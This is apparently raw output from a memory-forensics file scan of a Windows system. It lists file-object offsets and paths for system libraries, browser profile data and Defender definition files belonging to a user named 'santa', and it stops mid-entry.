+0x918b75d85570 \CMNotify 216 +0x918b75d85700 \Windows\Registration\R000000000006.clb 216 +0x918b75d85890 \Windows\System32\svchost.exe 216 +0x918b75d85a20 \$Directory 216 +0x918b75d861f0 \Windows\System32 216 +0x918b75d86510 \Windows\System32\en-US\winsrv.dll.mui 216 +0x918b75d866a0 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b75d86830 \Windows\System32\en-US\user32.dll.mui 216 +0x918b75d869c0 \Windows\System32\cdpusersvc.dll 216 +0x918b75d86b50 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb.log 216 +0x918b75d87320 \Windows\Fonts\SitkaB.ttc 216 +0x918b75d874b0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b75d87640 \Windows\System32\en-US\taskhostw.exe.mui 216 +0x918b75d877d0 \$Directory 216 +0x918b75d87960 \Windows\System32 216 +0x918b75d87990 秨痘醋￿秨痘醋￿ 0 +0x918b75d87af0 \Windows\System32\DesktopShellExt.dll 216 +0x918b75d87c80 \$Directory 216 +0x918b75d87e10 \Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.54.4001.0_x64__8wekyb3d8bbwe 216 +0x918b75d882c0 \Windows\Registration\R000000000006.clb 216 +0x918b75d88450 \$Directory 216 +0x918b75d88770 \$Directory 216 +0x918b75d88900 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb 216 +0x918b75d88a90 \Windows\System32\MsCtfMonitor.dll 216 +0x918b75d88c20 \Windows\System32\PlaySndSrv.dll 216 +0x918b75d890d0 \Windows\System32\WpnUserService.dll 216 +0x918b75d89260 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\cert9.db 216 +0x918b75d893f0 \Dev\Query 216 +0x918b75d89580 \Windows\System32\taskhostw.exe 216 +0x918b75d898a0 \Dev\Query 216 +0x918b75d89a30 \Windows\Registration\R000000000006.clb 216 +0x918b75d89bc0 \$Directory 216 +0x918b75d89d50 \Windows\System32\Windows.Networking.Connectivity.dll 216 +0x918b75d8a200 \CMApi 216 +0x918b75d8a520 \Windows\System32\QuietHours.dll 216 +0x918b75d8a6b0 \Windows\System32\ExecModelClient.dll 216 +0x918b75d8a9d0 \Windows\System32\ClipboardServer.dll 216 +0x918b75d8ab60 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b75d8acf0 \Windows\System32\SecureTimeAggregator.dll 216 +0x918b75d8ae80 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData 216 +0x918b75d8b1a0 \Windows\System32\WinBioPlugIns\FaceBootstrapAdapter.dll 216 +0x918b75d8b4c0 \Windows\System32\msutb.dll 216 +0x918b75d8b650 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b75d8b7e0 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b75d8b970 \Windows\System32\ActivationManager.dll 216 +0x918b75d8bb00 \Windows\System32\wcmapi.dll 216 +0x918b75d8bc90 \Windows\System32\ncryptsslp.dll 216 +0x918b75d8c140 \Windows\System32\ncryptprov.dll 216 +0x918b75d8c2d0 \Windows\System32\dssenh.dll 216 +0x918b75d8c460 \Windows\System32\TabSvc.dll 216 +0x918b75d8c780 \$Directory 216 +0x918b75d8caa0 \CMNotify 216 +0x918b75d8cc30 \Windows\System32\ctfmon.exe 216 +0x918b75d8cdc0 \Windows\System32\en-US\MsCtfMonitor.dll.mui 216 +0x918b75d8d0e0 \Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx 216 +0x918b75d8d400 \CMNotify 216 +0x918b75d8d590 \Windows\System32\TokenBroker.dll 216 +0x918b75d8d720 \Windows\System32 216 +0x918b75d8da40 \$Directory 216 +0x918b75d8dbd0 \Windows\System32\en-US\ctfmon.exe.mui 216 +0x918b75d8dd60 \Windows\System32\AppointmentActivation.dll 216 +0x918b75d8def0 \Users\santa\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-shm 216 +0x918b75d8e530 \Users\santa\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-wal 216 +0x918b75d8e6c0 \Users\santa\AppData\Local\Microsoft\Windows\WebCache\V01.loglogog 216 +0x918b75d8e9e0 \Windows\System32\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll 216 +0x918b75d8eb70 \Windows\System32\en-US\ESENT.dll.mui 216 +0x918b75d8f1b0 \Users\santa\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat 216 +0x918b75d8f340 \Windows\System32\BitsProxy.dll 216 +0x918b75d8f4d0 \$Directory 216 +0x918b75d8f660 \CMApi 216 +0x918b75d8f7f0 \$Directory 216 +0x918b75d8f980 \Windows\System32\modernexecserver.dll 216 +0x918b75d8fb10 \Windows\System32\en-US\winmm.dll.mui 216 +0x918b75d8fca0 \$Directory 216 +0x918b75d8fe30 \Users\santa\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db 216 +0x918b75d90150 \Windows\System32\InputService.dll 216 +0x918b75d90600 \Endpoint 216 +0x918b75d90790 \Windows\System32\SebBackgroundManagerPolicy.dll 216 +0x918b75d90920 \Windows\System32 216 +0x918b75d90c40 \Windows\System32\svchost.exe 216 +0x918b75d910f0 \Users\santa\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm 216 +0x918b75d91280 \Windows\System32\en-US\localspl.dll.mui 216 +0x918b75d91410 \Windows\System32\Windows.Internal.Graphics.Display.DisplayColorManagement.dll 216 +0x918b75d915a0 \Windows\System32\ACPBackgroundManagerPolicy.dll 216 +0x918b75d91730 \Windows\System32\Windows.ApplicationModel.dll 216 +0x918b75d918c0 \Windows\System32\Windows.Security.Authentication.Web.Core.dll 216 +0x918b75d91a50 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b75d91be0 \LOCAL\cubeb-pipe-4576-13 216 +0x918b75d91d70 \Windows\System32\WindowManagement.dll 216 +0x918b75d923b0 \Windows\System32\perfdisk.dll 216 +0x918b75d92540 \Windows\System32\execmodelproxy.dll 216 +0x918b75d926d0 \Windows\System32\en-US\cmd.exe.mui 216 +0x918b75d92860 \Windows\System32\PrintIsolationProxy.dll 216 +0x918b75d929f0 \Windows\System32\tokenbinding.dll 216 +0x918b75d92b80 \Windows\System32\BackgroundMediaPolicy.dll 216 +0x918b75d92d10 \CMApi 216 +0x918b75d92ea0 \Windows\System32\notificationplatformcomponent.dll 216 +0x918b75d931c0 \Windows\System32\TextInputMethodFormatter.dll 216 +0x918b75d93350 \Windows\System32\ShareHost.dll 216 +0x918b75d93800 \Windows\System32\localspl.dll 216 +0x918b75d93990 \CMApi 216 +0x918b75d93cb0 \Windows\System32\spoolss.dll 216 +0x918b75d93e40 \Windows\System32\dui70.dll 216 +0x918b75d942f0 \Endpoint 216 +0x918b75d94480 \Windows\System32\perfos.dll 216 +0x918b75d94610 \Windows\System32\sfc_os.dll 216 +0x918b75d94930 \Windows\Registration\R000000000006.clb 216 +0x918b75d94c50 \Windows\System32\FXSMON.dll 216 +0x918b75d95100 \Windows\System32\rasman.dll 216 +0x918b75d95420 \CMNotify 216 +0x918b75d955b0 \Windows\System32\AppContracts.dll 216 +0x918b75d95740 \Windows\System32\AppMon.dll 216 +0x918b75d958d0 \Windows\System32\winspool.drv 216 +0x918b75d95a60 \Program Files (x86)\Mozilla Firefox 216 +0x918b75d95bf0 \Windows\System32\wpnprv.dll 216 +0x918b75d95d80 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b75d96550 \$Directory 216 +0x918b75d96870 \CMApi 216 +0x918b75d96b90 \Windows\Fonts\segmdl2.ttf 216 +0x918b75d96d20 \Windows\System32\Windows.Networking.Sockets.PushEnabledApplication.dll 216 +0x918b75d96eb0 \Windows\System32\wuceffects.dll 216 +0x918b76024150 \Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Admin.evtx 216 +0x918b760242e0 \Windows\System32\deviceassociation.dll 216 +0x918b76024470 \AsyncConnectHlp 216 +0x918b76024600 \MsFteWds 216 +0x918b76024790 \Windows\System32\ole32.dll 216 +0x918b76024920 \Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms 216 +0x918b76024ab0 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b76024c40 \Endpoint 216 +0x918b76024dd0 \Windows\System32\usbmon.dll 216 +0x918b760250f0 \Windows\System32\PackageStateChangeHandler.dll 216 +0x918b76025280 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b76025410 \Windows\System32\snmpapi.dll 216 +0x918b760255a0 \Windows\System32\container.dll 216 +0x918b76025730 \Windows\System32\C_1256.NLS 216 +0x918b760258c0 \Windows\System32\dusmapi.dll 216 +0x918b76025a50 \Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms 216 +0x918b76025be0 \CMNotify 216 +0x918b76025d70 \Windows\System32\wlidprov.dll 216 +0x918b76026090 \Windows\System32\tcpmon.dll 216 +0x918b76026220 \Windows\System32\wsnmp32.dll 216 +0x918b760263b0 \Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx 216 +0x918b76026540 \Windows\System32\APMon.dll 216 +0x918b760266d0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b76026860 \Windows\System32\twinui.appcore.dll 216 +0x918b760269f0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b76026b80 \Windows\System32\InputLocaleManager.dll 216 +0x918b76026d10 \AsyncSelectHlp 216 +0x918b76026ea0 \Windows\System32\MusNotificationUx.exe 216 +0x918b760271c0 \$Directory 216 +0x918b76027350 \Windows\System32\C_1254.NLS 216 +0x918b760274e0 \Windows\System32\C_1253.NLS 216 +0x918b76027670 \Dev\Query 216 +0x918b76027800 \Windows\Registration\R000000000006.clb 216 +0x918b76027990 \Windows\System32\C_1251.NLS 216 +0x918b76027b20 \Windows\System32\AppResolver.dll 216 +0x918b76027cb0 \Windows\System32\en-US\APMon.dll.mui 216 +0x918b76027e40 \CMApi 216 +0x918b76028160 \Users\santa\AppData\Local\Microsoft\Windows\Caches\cversions.3.db 216 +0x918b760282f0 \Windows\Registration\R000000000006.clb 216 +0x918b76028480 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b76028610 \Windows\System32\cdpsvc.dll 216 +0x918b760287a0 \Windows\System32\WSDApi.dll 216 +0x918b76028930 \Windows\System32\C_1250.NLS 216 +0x918b76028ac0 \Windows\Web\Wallpaper\Theme1\Desktop.ini 216 +0x918b76028de0 \Windows\System32\Windows.StateRepositoryClient.dll 216 +0x918b76029100 \Windows\System32\tquery.dll 216 +0x918b76029420 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b760295b0 \Windows\System32\MTF.dll 216 +0x918b76029740 \Dev\Query 216 +0x918b760298d0 \Windows\System32\UiaManager.dll 216 +0x918b76029a60 \CMApi 216 +0x918b76029bf0 \Windows\System32\webservices.dll 216 +0x918b76029d80 \gecko.4576.3988.585370181143719742 216 +0x918b7602a0a0 \Windows\System32\mssrch.dll 216 +0x918b7602a230 \Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Assets\Blank_PhotosSplashWideTile.png 216 +0x918b7602a3c0 \$Directory 216 +0x918b7602a550 \Users\santa\AppData\Roaming\Microsoft\Windows\Recent\The Internet.lnk 216 +0x918b7602a6e0 \Windows 216 +0x918b7602a870 \Windows 216 +0x918b7602aa00 \$Directory 216 +0x918b7602ab90 \Windows\System32\Windows.CloudStore.Schema.Shell.dll 216 +0x918b7602ad20 \Windows\System32\sbservicetrigger.dll 216 +0x918b7602aeb0 \$Directory 216 +0x918b7602b1d0 \Windows\System32\keyiso.dll 216 +0x918b7602b360 \Windows\System32\EAMProgressHandler.dll 216 +0x918b7602b4f0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b7602b680 \Windows\System32\drvstore.dll 216 +0x918b7602b810 \Windows\System32\daxexec.dll 216 +0x918b7602b9a0 \Windows\System32\threadpoolwinrt.dll 216 +0x918b7602bb30 \Windows\System32\Windows.Shell.BlueLightReduction.dll 216 +0x918b7602bcc0 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b7602be50 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 216 +0x918b7602c170 \Windows\System32\CoreShellExtFramework.dll 216 +0x918b7602c300 \Windows\System32\wpnclient.dll 216 +0x918b7602c490 \Windows\System32\spool\prtprocs\x64\winprint.dll 216 +0x918b7602c620 \$Directory 216 +0x918b7602c7b0 \Program Files (x86)\Mozilla Firefox 216 +0x918b7602c940 \Windows\System32\wshbth.dll 216 +0x918b7602cad0 \CMApi 216 +0x918b7602cdf0 \Windows\System32\ContentDeliveryManager.Utilities.dll 216 +0x918b7602d110 \Windows\System32\en-US\datamap.0409.dat 216 +0x918b7602d2a0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b7602d430 \Windows\System32\twinui.pcshell.dll 216 +0x918b7602d5c0 \Endpoint 216 +0x918b7602d750 \Windows\System32\en-US\inetpp.dll.mui 216 +0x918b7602d8e0 \Windows\System32\wpnapps.dll 216 +0x918b7602da70 \Windows\System32\imageres.dll 216 +0x918b7602dc00 \$Directory 216 +0x918b7602dd90 \Windows\Fonts\mmrtext.ttf 216 +0x918b7602e0b0 \$Directory 216 +0x918b7602e240 \Windows\SysWOW64\mswsock.dll 216 +0x918b7602e3d0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb 216 +0x918b7602e560 \Windows\SystemResources\imageres.dll.mun 216 +0x918b7602e6f0 \CMApi 216 +0x918b7602ea10 \Windows\System32\AuthExt.dll 216 +0x918b7602eba0 \$Directory 216 +0x918b7602ed30 \SwDevice 216 +0x918b7602f1e0 \$Directory 216 +0x918b7602f370 \$Directory 216 +0x918b7602f500 \Windows\System32\inetpp.dll 216 +0x918b7602f690 \$Directory 216 +0x918b7602f820 \Windows\System32\Windows.StateRepositoryBroker.dll 216 +0x918b7602f9b0 \Windows\System32\win32spl.dll 216 +0x918b7602fcd0 \Windows\System32\ieproxy.dll 216 +0x918b7602fe60 \Windows\System32\en-US\win32spl.dll.mui 216 +0x918b76030180 \Dev\Query 216 +0x918b76030310 \Windows\System32 216 +0x918b760304a0 \Program Files (x86)\Mozilla Firefox 216 +0x918b76030630 \Windows\System32\en-US\AuthExt.dll.mui 216 +0x918b760307c0 \Windows\Prefetch\MICROSOFTEDGEUPDATE.EXE-96674210.pf 216 +0x918b76030950 \Windows\System32\spool\drivers\W32X86\PCC 216 +0x918b76030ae0 \Windows\System32\wscui.cpl 216 +0x918b76030c70 \Windows\System32\wups2.dll 216 +0x918b76030e00 \Users\santa\AppData\Local\Temp\MicrosoftEdgeUpdate.log 216 +0x918b76031120 \$Directory 216 +0x918b760312b0 \Windows\System32 216 +0x918b760315d0 \Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 216 +0x918b76031760 \Windows\SysWOW64\TextInputFramework.dll 216 +0x918b760318f0 \SwDevice 216 +0x918b76031a80 \Windows\System32\PhotoMetadataHandler.dll 216 +0x918b760320c0 \Windows\System32\twinapi.dll 216 +0x918b76032570 \CMNotify 216 +0x918b76032700 \Windows\System32\imm32.dll 216 +0x918b76032890 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b76032a20 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\Indexed DB\IndexedDB.jfm 216 +0x918b76032ed0 \CMNotify 216 +0x918b760331f0 \Dev\Query 216 +0x918b76033380 \Endpoint 216 +0x918b76033510 \SwDevice 216 +0x918b760336a0 \Windows\System32\vaultcli.dll 216 +0x918b76033830 \SwDevice 216 +0x918b760339c0 \Windows\System32\NetworkStatus.dll 216 +0x918b76033b50 \gecko.4576.3988.585370181143719742 216 +0x918b76033ce0 \$Directory 216 +0x918b76033e70 \$Directory 216 +0x918b76034190 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b76034320 \$Directory 216 +0x918b760344b0 \Windows\System32\en-US\ieframe.dll.mui 216 +0x918b76034640 \Windows\System32\ieframe.dll 216 +0x918b76034960 \Windows\Fonts\segoeuib.ttf 216 +0x918b76034af0 \Windows\System32\StartTileData.dll 216 +0x918b76034c80 \Windows\System32\msi.dll 216 +0x918b76034e10 \Windows\System32\en-US\shell32.dll.mui 216 +0x918b76035130 \Windows\SysWOW64\wshqos.dll 216 +0x918b760352c0 \Users\santa\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK 216 +0x918b76035450 \Windows\Fonts\cambriai.ttf 216 +0x918b760355e0 \$Directory 216 +0x918b76035770 \Windows\System32\en-US\MusNotifyIcon.exe.mui 216 +0x918b76035900 \gecko.4576.3988.18146219246632876385 216 +0x918b76035a90 \$Directory 216 +0x918b76035c20 \Windows\System32\MusNotificationUx.exe 216 +0x918b76035db0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b760360d0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b76036260 \Users\santa\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db 216 +0x918b760363f0 \Windows\Fonts\times.ttf 216 +0x918b76036710 \Windows\Registration\R000000000006.clb 216 +0x918b760368a0 \Windows\System32\sppc.dll 216 +0x918b76036a30 \$Directory 216 +0x918b76036bc0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b76036ee0 \$Directory 216 +0x918b76037200 \Windows\System32\spool\drivers\x64\PCC 216 +0x918b76037390 \Windows\System32\Windows.UI.Xaml.Resources.Common.dll 216 +0x918b76037520 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{0050F440-DE0F-48EE-A4F2-CDD94F01CAB6}.catalogItem 216 +0x918b760376b0 \Windows\System32\spp\store\2.0\tokens.dat 216 +0x918b760379d0 \$Directory 216 +0x918b76037b60 \Windows\System32 216 +0x918b76037e80 \$Directory 216 +0x918b76038330 \Windows\System32\NotificationControllerPS.dll 216 +0x918b760384c0 \Windows\System32\vm3ddevapi64.dll 216 +0x918b76038650 \$Directory 216 +0x918b760387e0 \$Directory 216 +0x918b76038970 \Windows 216 +0x918b76038c90 \Windows\System32\spool\drivers\W32X86\PCC 216 +0x918b76038e20 \Windows\System32\Windows.ApplicationModel.Core.dll 216 +0x918b76039140 \Windows\System32\wbem\wmiprov.dll 216 +0x918b760392d0 \Windows\Registration\R000000000006.clb 216 +0x918b760395f0 \$ConvertToNonresident 216 +0x918b76039780 \$Directory 216 +0x918b76039910 \$Directory 216 +0x918b76039aa0 \Windows\System32\MitigationClient.dll 216 +0x918b76039c30 \$Directory 216 +0x918b76039dc0 \gecko.4576.3988.4692312835060683011 216 +0x918b7603a0e0 \Endpoint 216 +0x918b7603a270 \Windows\System32\config\COMPONENTS.LOG1 216 +0x918b7603a400 \Windows\System32\config\COMPONENTS.LOG2 216 +0x918b7603a720 \Endpoint 216 +0x918b7603a8b0 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\User\Default\CacheStorage\CacheStorage.jfm 216 +0x918b7603aa40 \Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx 216 +0x918b7603abd0 \CMNotify 216 +0x918b7603ad60 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b7603aef0 \$Directory 216 +0x918b7603b080 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b7603b210 \Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi 216 +0x918b7603b3a0 \CMNotify 216 +0x918b7603b850 \Windows\System32\vm3ddevapi64-release.dll 216 +0x918b7603bb70 \Windows\System32 216 +0x918b7603bd00 \Windows\System32\spool\drivers\x64\PCC 216 +0x918b7603be90 \Endpoint 216 +0x918b7603c340 \Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.401.765.0.exe 216 +0x918b7603c4d0 \$Directory 216 +0x918b7603c660 \gecko.4576.3988.18146219246632876385 216 +0x918b7603c7f0 \$Directory 216 +0x918b7603c980 \$Directory 216 +0x918b7603cb10 \ProgramData\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\User.dat 216 +0x918b7603cca0 \$Directory 216 +0x918b7603d150 \Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll 216 +0x918b7603d2e0 \Windows\System32\spool\drivers\x64\PCC 216 +0x918b7603d470 \Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx 216 +0x918b7603d600 \Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\1.401.765.0_to_1.401.798.0_mpasdlta.vdm._p 216 +0x918b7603d790 \Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\vccorlib140.dll 216 +0x918b7603d920 \Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll 216 +0x918b7603dab0 \Windows\SysWOW64\vccorlib140.dll 216 +0x918b7603dc40 \Windows\System32\DeviceDirectoryClient.dll 216 +0x918b7603e0f0 \Windows\System32\spool\drivers\x64\PCC 216 +0x918b7603e280 \$Directory 216 +0x918b7603e5a0 \Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll 216 +0x918b7603e8c0 \Windows\System32\SndVolSSO.dll 216 +0x918b7603ea50 \gecko.4576.3988.1511846534483018721 216 +0x918b7603ed70 \Windows\System32\SettingSyncCore.dll 216 +0x918b7603f090 \$Directory 216 +0x918b7603f220 \$Directory 216 +0x918b7603f3b0 \Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask 216 +0x918b7603f540 \Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx 216 +0x918b7603f6d0 \Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\msvcp140.dll 216 +0x918b7603f9f0 \Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx 216 +0x918b7603fb80 \Windows\System32\spool\drivers\x64\PCC 216 +0x918b7603fd10 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\idb\4167130407yCt7G%cCf7C%o7ndfci6g.sqlite 216 +0x918b7603fea0 \1840.1da1a23c79ec4cf 216 +0x918b760401c0 \Windows\System32\wpdshext.dll 216 +0x918b76040350 \Windows\System32\prm0009.dll 216 +0x918b760404e0 \Windows\System32\en-US\NotificationController.dll.mui 216 +0x918b76040670 \gecko.4576.3988.5164763320614748629 216 +0x918b76040800 \$Directory 216 +0x918b76040990 \gecko.4576.3988.5164763320614748629 216 +0x918b76040b20 \Windows\System32\oleacc.dll 216 +0x918b76040e40 \Windows\System32\DevDispItemProvider.dll 216 +0x918b76041160 \Windows\System32\en-US\oleaccrc.dll.mui 216 +0x918b760412f0 \Windows\System32\DataExchange.dll 216 +0x918b76041480 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b76041610 \Windows\System32\en-US\combase.dll.mui 216 +0x918b760417a0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b76041ac0 \Windows\System32\ExplorerFrame.dll 216 +0x918b76041c50 \Program Files (x86)\Mozilla Firefox\firefox.exe 216 +0x918b76041de0 \Windows\System32\RTWorkQ.dll 216 +0x918b76042100 \Windows\System32\StructuredQuery.dll 216 +0x918b76042290 \Windows\Fonts\StaticCache.dat 216 +0x918b760425b0 \Windows\System32\en-US\netmsg.dll.mui 216 +0x918b76042740 \Windows\Registration\R000000000006.clb 216 +0x918b760428d0 \Windows\System32\spp\plugin-manifests-signed\sppwinob-spp-plugin-manifest-signed.xrm-ms 216 +0x918b76042bf0 \Windows\System32\oleaccrc.dll 216 +0x918b76042d80 \Windows\System32\wbem\WmiPerfInst.dll 216 +0x918b760430a0 \gecko.4576.3988.1511846534483018721 216 +0x918b76043230 \Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\1.401.765.0_to_1.401.798.0_mpavdlta.vdm._p 216 +0x918b760433c0 \Windows\System32\MSWB7.dll 216 +0x918b76043550 \LOCAL\cubeb-pipe-4576-13 216 +0x918b760436e0 \Windows\System32\spp\plugin-manifests-signed\sppobjs-spp-plugin-manifest-signed.xrm-ms 216 +0x918b76043870 \Windows\Registration\R000000000006.clb 216 +0x918b76043b90 \Windows\System32\en-US\wscui.cpl.mui 216 +0x918b76043eb0 \Windows\SysWOW64\MrmCoreR.dll 216 +0x918b76060a00 ੘瘆醋￿੘瘆醋￿ 0 +0x918b760df2e0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\cversions.3.db 216 +0x918b760df470 \Windows\System32 216 +0x918b760df600 \ProgramData\Microsoft\Windows\OneSettings\config.json 216 +0x918b760df790 \Windows\System32\thumbcache.dll 216 +0x918b760dfab0 \Windows\System32\CBDHSvc.dll 216 +0x918b760dfc40 \Windows\Registration\R000000000006.clb 216 +0x918b760dfdd0 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b760e00f0 \$Directory 216 +0x918b760e0280 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b760e0410 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b760e05a0 \Windows\SysWOW64\FWPUCLNT.DLL 216 +0x918b760e0730 \Windows\System32\windows.applicationmodel.datatransfer.dll 216 +0x918b760e0a50 \CMApi 216 +0x918b760e0be0 \Windows\System32\MusNotifyIcon.exe 216 +0x918b760e0d70 \Windows\Fonts\timesbi.ttf 216 +0x918b760e1090 \Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx 216 +0x918b760e1220 \Windows\Fonts\timesbd.ttf 216 +0x918b760e13b0 \Windows\System32\windows.immersiveshell.serviceprovider.dll 216 +0x918b760e1540 \Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 216 +0x918b760e16d0 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal 216 +0x918b760e1860 \Windows\System32\svchost.exe 216 +0x918b760e19f0 \Windows\System32\edputil.dll 216 +0x918b760e1b80 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db 216 +0x918b760e1d10 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b760e1ea0 \Windows\Fonts\timesi.ttf 216 +0x918b760e21c0 \Windows\System32 216 +0x918b760e2350 \Windows\System32\ntshrui.dll 216 +0x918b760e24e0 \ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpavdlta.vdm 216 +0x918b760e2990 \CMNotify 216 +0x918b760e2b20 \CMNotify 216 +0x918b760e2cb0 \ProgramData\Microsoft\Windows\OneSettings\UsoSettings.json 216 +0x918b760e2e40 \Windows\System32\wbem\NCProv.dll 216 +0x918b760e3160 \$Directory 216 +0x918b760e32f0 \Windows\System32\cldapi.dll 216 +0x918b760e3480 \PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER 216 +0x918b760e37a0 \Windows\Prefetch\MUSNOTIFYICON.EXE-19B43B6D.pf 216 +0x918b760e3930 \Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Backup Scan 216 +0x918b760e3ac0 \ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpasdlta.vdm 216 +0x918b760e3c50 \Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\mpavdlta.vdm 216 +0x918b760e3de0 \ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpasbase.vdm 216 +0x918b760e4100 \Windows\System32\ApplicationFrame.dll 216 +0x918b760e4290 \Windows\System32\winbrand.dll 216 +0x918b760e4420 \Windows\System32\Pimstore.dll 216 +0x918b760e45b0 \Windows\System32\twinui.dll 216 +0x918b760e4740 \ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpasdlta.vdm 216 +0x918b760e48d0 \ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpavbase.vdm 216 +0x918b760e4a60 